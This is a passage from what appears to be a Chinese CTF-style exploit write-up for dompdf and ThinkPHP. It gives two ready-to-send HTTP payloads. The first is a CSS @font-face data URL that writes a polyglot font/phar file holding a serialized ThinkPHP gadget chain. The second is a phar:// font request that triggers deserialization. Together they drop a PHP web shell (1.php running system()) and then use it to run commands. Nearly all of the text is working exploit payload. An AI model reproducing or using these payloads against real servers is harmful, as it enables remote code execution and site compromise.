3RlbSgpOyA%252FPicgPiAvdmFyL3d3dy9odG1sL3B1YmxpYy8xLnBocCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7fXM6NjoiACoAdGFnIjtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NDoiaG9zdCI7czo5OiIxMjcuMC4wLjEiO3M6NDoicG9ydCI7aToxMTIxMTtzOjY6ImV4cGlyZSI7aTozNjAwO3M6NzoidGltZW91dCI7aTowO3M6MTI6InNlc3Npb25fbmFtZSI7czo2OiJIRVhFTlMiO3M6ODoidXNlcm5hbWUiO3M6MDoiIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX19fX0IAAAAdGVzdC50eHQEAAAAthRJZAQAAAAMfn%252FYpAEAAAAAAAB0ZXN022l2ia1yjzHI4j9%252F%252FNeso0pc1gcCAAAAR0JNQg%253D%253D');
        font-weight:'normal';
        font-style:'normal';
    }
</style>

====== REQUEST 2 NOT ENCODED =======

<style>
    @font-face {
        font-family:'exploit';
        src:url('phar:///var/www/html/vendor/dompdf/dompdf/lib/fonts/exploit_normal_da94a27b825aeca64e86b19a3972972d.ttf##');
        font-weight:'normal';
        font-style:'normal';
    }
</style>

将====== REQUEST 1 ENCODED =======先写入phar

<style>@font-face+{+font-family:'exploit';+src:url('data:text/plain;base64,UHJvZ3JhbSByb290OiAvdXNyCldhcm5pbmc6IEZvbnQgY29udGFpbmVkIG5vIGdseXBocwrvv73vv706Y3Z0ICF5Z2FzcO%252B%252Fve%252B%252FvWdseWY977%252B977%252B9PmFwCiAgICAgICAgICAgICAgICAgICAgICAgVGhlYWQhRe%252B%252Fve%252B%252Fve%252B%252FvTZoaGVhICRobXR477%252B9Ie%252B%252FvQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvY2EqbWF4cEc5OCBuYW1l77%252B9IylGYO%252B%252FvXBvc3Tvv73vv70yRCLvv712Tl8877%252B9CiAgICAgICAg77%252B977%252B9bkvvv73vv71uS%252B%252B%252FvSEq77%252B9Wu%252B%252Fve%252B%252FvUAu77%252B977%252B977%252B977%252B977%252B977%252B977%252B977%252B9MVBmRWTvv73vv73vv70g77%252B9OFrvv70gbCFNNOKWku%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvSF5KioqISrvv70u77%252B9Lzzvv73vv70y77%252B977%252B9PO%252B%252Fve%252B%252FvTLvv70vPO%252B%252Fve%252B%252FvTLvv73vv70877%252B977%252B9MjMhJzMjISAgICAgIO%252B%252Fve%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvWYhWO%252B%252FvQogICAgICAgIDVPJe%252B%252FvSAgICDvv70gICAgICAgKyAgICAgICAgICAgICAgICEgICAgICAgPyAgICAgICBKVyAgICAgIO%252B%252FvSAgICAgICDvv70gICBEVU1NWSBGT05URFVNTVkgRk9OVFVudGl0bGVkMVVudGl0bGVkMVJlZ3VsYXJSZWd1bGFyRm9udEZvcmdlIDIuMCA6IFVudGl0bGVkMSA6IDI2LTQtMjAyM0ZvbnRGb3JnZSAyLjAgOiBVbnRpdGxlZDEgOiAyNi00LTIwMjNVbnRpdGxlZDFVbnRpdGxlZDFWZXJzaW9uIDAwMS4wMDBWZXJzaW9uIDAwMS4wMDBVbnRpdGxlZDFVbnRpdGxlZDHvv73vv70y77%252B977%252B977%252B977%252B977%252B9de%252B%252FvW5L77%252B977%252B9bkvvv70KPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8%252BDQpVCgAAAQAAABEAAAABAAAAAAAfCgAATzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NTp7czo5OiIAKgBhcHBlbmQiO2E6MTp7aTowO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTU6IgAqAHNlbGZSZWxhdGlvbiI7YjowO3M6ODoiACoAcXVlcnkiO086MTQ6InRoaW5rXGRiXFF1ZXJ5IjoxOntzOjg6IgAqAG1vZGVsIjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoyOntzOjEwOiIAKgBoYW5kbGVyIjtPOjI3OiJ0aGlua1xjYWNoZVxkcml2ZXJcTWVtY2FjaGUiOjM6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czowOiIiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoiACoAaGFuZGxlciI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mjp7czo2OiIAKgBnZXQiO2E6MTp7czoxODoiSEVYRU5TPGdldEF0dHI%252Bbm88IjtzOjU0OiJlY2hvICc8P3BocCBzeXN0ZW0oKTsgPz4nID4gL3Zhci93d3cvaHRtbC9wdWJsaWMvMS5waHAiO31zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO31zOjY6IgAqAHRhZyI7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjQ6Imhvc3QiO3M6OToiMTI3LjAuMC4xIjtzOjQ6InBvcnQiO2k6MTEyMTE7czo2OiJleHBpcmUiO2k6MzYwMDtzOjc6InRpbWVvdXQiO2k6MDtzOjEyOiJzZXNzaW9uX25hbWUiO3M6NjoiSEVYRU5TIjtzOjg6InVzZXJuYW1lIjtzOjA6IiI7czo4OiJwYXNzd29yZCI7czowOiIiO319czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6Mjp7aTowO3M6Mjoibm8iO2k6MTtzOjM6IjEyMyI7fX1zOjk6IgAqAHBhcmVudCI7TzoyMDoidGhpbmtcY29uc29sZVxPdXRwdXQiOjI6e3M6Mjg6IgB0aGlua1xjb25zb2xlXE91dHB1dABoYW5kbGUiO086MzA6InRoaW5rXHNlc3Npb25cZHJpdmVyXE1lbWNhY2hlZCI6Mjp7czoxMDoiACoAaGFuZGxlciI7TzoyNzoidGhpbmtcY2FjaGVcZHJpdmVyXE1lbWNhY2hlIjozOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6MDoiIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6MTA6IgAqAGhhbmRsZXIiO086MTM6InRoaW5rXFJlcXVlc3QiOjI6e3M6NjoiACoAZ2V0IjthOjE6e3M6MTg6IkhFWEVOUzxnZXRBdHRyPm5vPCI7czo1NDoiZWNobyAnPD9waHAgc3lzdGVtKCk7ID8%252BJyA%252BIC92YXIvd3d3L2h0bWwvcHVibGljLzEucGhwIjt9czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjt9czo2OiIAKgB0YWciO2I6MTt9czo5OiIAKgBjb25maWciO2E6Nzp7czo0OiJob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo0OiJwb3J0IjtpOjExMjExO3M6NjoiZXhwaXJlIjtpOjM2MDA7czo3OiJ0aW1lb3V0IjtpOjA7czoxMjoic2Vzc2lvbl9uYW1lIjtzOjY6IkhFWEVOUyI7czo4OiJ1c2VybmFtZSI7czowOiIiO3M6ODoicGFzc3dvcmQiO3M6MDoiIjt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319czoxNToiACoAc2VsZlJlbGF0aW9uIjtiOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjI6e3M6MTA6IgAqAGhhbmRsZXIiO086Mjc6InRoaW5rXGNhY2hlXGRyaXZlclxNZW1jYWNoZSI6Mzp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTowO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjA6IiI7czoxMzoiZGF0YV9jb21wcmVzcyI7YjowO31zOjEwOiIAKgBoYW5kbGVyIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjoyOntzOjY6IgAqAGdldCI7YToxOntzOjE4OiJIRVhFTlM8Z2V0QXR0cj5ubzwiO3M6NTQ6ImVjaG8gJzw%252FcGhwIHN5c3RlbSgpOyA%252FPicgPiAvdmFyL3d3dy9odG1sL3B1YmxpYy8xLnBocCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7fXM6NjoiACoAdGFnIjtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NDoiaG9zdCI7czo5OiIxMjcuMC4wLjEiO3M6NDoicG9ydCI7aToxMTIxMTtzOjY6ImV4cGlyZSI7aTozNjAwO3M6NzoidGltZW91dCI7aTowO3M6MTI6InNlc3Npb25fbmFtZSI7czo2OiJIRVhFTlMiO3M6ODoidXNlcm5hbWUiO3M6MDoiIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX19fX0IAAAAdGVzdC50eHQEAAAAthRJZAQAAAAMfn%252FYpAEAAAAAAAB0ZXN022l2ia1yjzHI4j9%252F%252FNeso0pc1gcCAAAAR0JNQg%253D%253D');+font-weight:'normal';+font-style:'normal';}</style>

这里传content是因为审计源码的时候发现

知道这些以后，就可以去尝试post参数了

然后接着post第二个参数

触发phar

<style>@font-face+{+font-family:'exploit';+src:url('phar%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fvendor%2Fdompdf%2Fdompdf%2Flib%2Ffonts%2Fexploit_normal_da94a27b825aeca64e86b19a3972972d.ttf%23%23');+font-weight:'normal';+font-style:'normal';}</style>

然后直接访问1.php?0=ls就行了

参考文章 think PHP pdf rce